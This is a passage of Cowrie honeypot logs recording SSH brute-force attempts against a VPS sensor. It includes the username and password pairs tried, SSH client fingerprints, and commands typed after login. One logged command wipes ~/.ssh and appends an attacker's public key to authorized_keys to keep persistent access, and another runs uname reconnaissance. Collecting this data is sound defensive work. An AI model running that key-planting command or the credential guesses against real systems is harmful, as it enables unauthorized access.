1@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:07:16.939109Z","src_ip":"217.154.1.158","session":"6942af35a88d"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"mongodb","message":"login attempt [mongodb/mongodb] failed","sensor":"my-vps","timestamp":"2025-08-26T20:07:16.983180Z","src_ip":"217.154.1.158","session":"6942af35a88d"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:07:17.999781Z","src_ip":"217.154.1.158","session":"6942af35a88d"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":59640,"dst_ip":"1.2.3.4","dst_port":22,"session":"53cf8ef0b086","protocol":"ssh","message":"New connection: 217.154.1.158:59640 (1.2.3.4:22) [session: 53cf8ef0b086]","sensor":"my-vps","timestamp":"2025-08-26T20:07:34.373050Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:07:34.373685Z","src_ip":"217.154.1.158","session":"53cf8ef0b086"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:07:34.387830Z","src_ip":"217.154.1.158","session":"53cf8ef0b086"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"123456","message":"login attempt [mongodb/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T20:07:34.433408Z","src_ip":"217.154.1.158","session":"53cf8ef0b086"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:07:35.450114Z","src_ip":"217.154.1.158","session":"53cf8ef0b086"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":54636,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f1bb6cc38fa","protocol":"ssh","message":"New connection: 217.154.1.158:54636 (1.2.3.4:22) [session: 6f1bb6cc38fa]","sensor":"my-vps","timestamp":"2025-08-26T20:07:51.981737Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:07:51.982601Z","src_ip":"217.154.1.158","session":"6f1bb6cc38fa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:07:51.996324Z","src_ip":"217.154.1.158","session":"6f1bb6cc38fa"}
{"eventid":"cowrie.login.failed","username":"app","password":"123456","message":"login attempt [app/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T20:07:52.038498Z","src_ip":"217.154.1.158","session":"6f1bb6cc38fa"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:07:53.054442Z","src_ip":"217.154.1.158","session":"6f1bb6cc38fa"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":34918,"dst_ip":"1.2.3.4","dst_port":22,"session":"b210082b8ce7","protocol":"ssh","message":"New connection: 199.195.248.191:34918 (1.2.3.4:22) [session: b210082b8ce7]","sensor":"my-vps","timestamp":"2025-08-26T20:08:02.252715Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:08:02.263918Z","src_ip":"199.195.248.191","session":"b210082b8ce7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:08:02.351617Z","src_ip":"199.195.248.191","session":"b210082b8ce7"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa@123456..","message":"login attempt [root/Aa@123456..] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:08:02.706795Z","src_ip":"199.195.248.191","session":"b210082b8ce7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:08:02.917462Z","src_ip":"199.195.248.191","session":"b210082b8ce7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T20:08:02.918329Z","src_ip":"199.195.248.191","session":"b210082b8ce7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T20:08:02.919640Z","src_ip":"199.195.248.191","session":"b210082b8ce7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:08:03.021671Z","src_ip":"199.195.248.191","session":"b210082b8ce7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:08:03.315535Z","src_ip":"199.195.248.191","session":"b210082b8ce7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T20:08:03.316219Z","src_ip":"199.195.248.191","session":"b210082b8ce7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T20:08:03.419548Z","src_ip":"199.195.248.191","session":"b210082b8ce7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:08:03.420465Z","src_ip":"199.195.248.191","session":"b210082b8ce7"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":35386,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb78ef8cbd96","protocol":"ssh","message":"New connection: 199.195.248.191:35386 (1.2.3.4:22) [session: eb78ef8cbd96]","sensor":"my-vps","timestamp":"2025-08-26T20:08:03.504894Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:08:03.510052Z","src_ip":"199.195.248.191","session":"eb78ef8cbd96"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:08:03.604581Z","src_ip":"199.195.248.191","session":"eb78ef8cbd96"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T20:08:03.966360Z","src_ip":"199.195.248.191","session":"eb78ef8cbd96"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:08:05.056669Z","src_ip":"199.195.248.191","session":"eb78ef8cbd96"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":36020,"dst_ip":"1.2.3.4","dst_port":22,"session":"854dc07dfe26","protocol":"ssh","message":"New connection: 199.195.248.191:36020 (1.2.3.4:22) [session: 854dc07dfe26]","sensor":"my-vps","timestamp":"2025-08-26T20:08:05.141730Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:08:05.154638Z","src_ip":"199.195.248.191","session":"854dc07dfe26"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:08:05.243649Z","src_ip":"199.195.248.191","session":"854dc07dfe26"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:08:05.607450Z","src_ip":"199.195.248.191","session":"854dc07dfe26"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:08:05.700525Z","src_ip":"199.195.248.191","session":"b210082b8ce7"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:08:05.701593Z","src_ip":"199.195.248.191","session":"854dc07dfe26"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":36116,"dst_ip":"1.2.3.4","dst_port":22,"session":"58b23d41ccac","protocol":"ssh","message":"New connection: 217.154.1.158:36116 (1.2.3.4:22) [session: 58b23d41ccac]","sensor":"my-vps","timestamp":"2025-08-26T20:08:09.497049Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:08:09.498095Z","src_ip":"217.154.1.158","session":"58b23d41ccac"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:08:09.512288Z","src_ip":"217.154.1.158","session":"58b23d41ccac"}
{"eventid":"cowrie.login.success","username":"root","password":"Password","message":"login attempt [root/Password] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:08:09.556912Z","src_ip":"217.154.1.158","session":"58b23d41ccac"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:08:09.652467Z","src_ip":"217.154.1.158","session":"58b23d41ccac"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:08:09.653490Z","src_ip":"217.154.1.158","session":"58b23d41ccac"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:08:09.668931Z","src_ip":"217.154.1.158","session":"58b23d41ccac"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:08:09.669920Z","src_ip":"217.154.1.158","session":"58b23d41ccac"}
{"eventid":"cowrie.session.connect","src_ip":"112.166.27.182","src_port":51732,"dst_ip":"1.2.3.4","dst_port":23,"session":"f733d4bd70cc","protocol":"telnet","message":"New connection: 112.166.27.182:51732 (1.2.3.4:23) [session: f733d4bd70cc]","sensor":"my-vps","timestamp":"2025-08-26T20:08:23.543685Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":58320,"dst_ip":"1.2.3.4","dst_port":22,"session":"7602a40cb6f9","protocol":"ssh","message":"New connection: 217.154.1.158:58320 (1.2.3.4:22) [session: 7602a40cb6f9]","sensor":"my-vps","timestamp":"2025-08-26T20:08:27.052970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:08:27.053991Z","src_ip":"217.154.1.158","session":"7602a40cb6f9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:08:27.068210Z","src_ip":"217.154.1.158","session":"7602a40cb6f9"}
{"eventid":"cowrie.login.failed","username":"www","password":"123456","message":"login attempt [www/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T20:08:27.112761Z","src_ip":"217.154.1.158","session":"7602a40cb6f9"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:08:28.129533Z","src_ip":"217.154.1.158","session":"7602a40cb6f9"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":39162,"dst_ip":"1.2.3.4","dst_port":22,"session":"136f21851321","protocol":"ssh","message":"New connection: 217.154.1.158:39162 (1.2.3.4:22) [session: 136f21851321]","sensor":"my-vps","timestamp":"2025-08-26T20:08:44.547168Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:08:44.548050Z","src_ip":"217.154.1.158","session":"136f21851321"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-2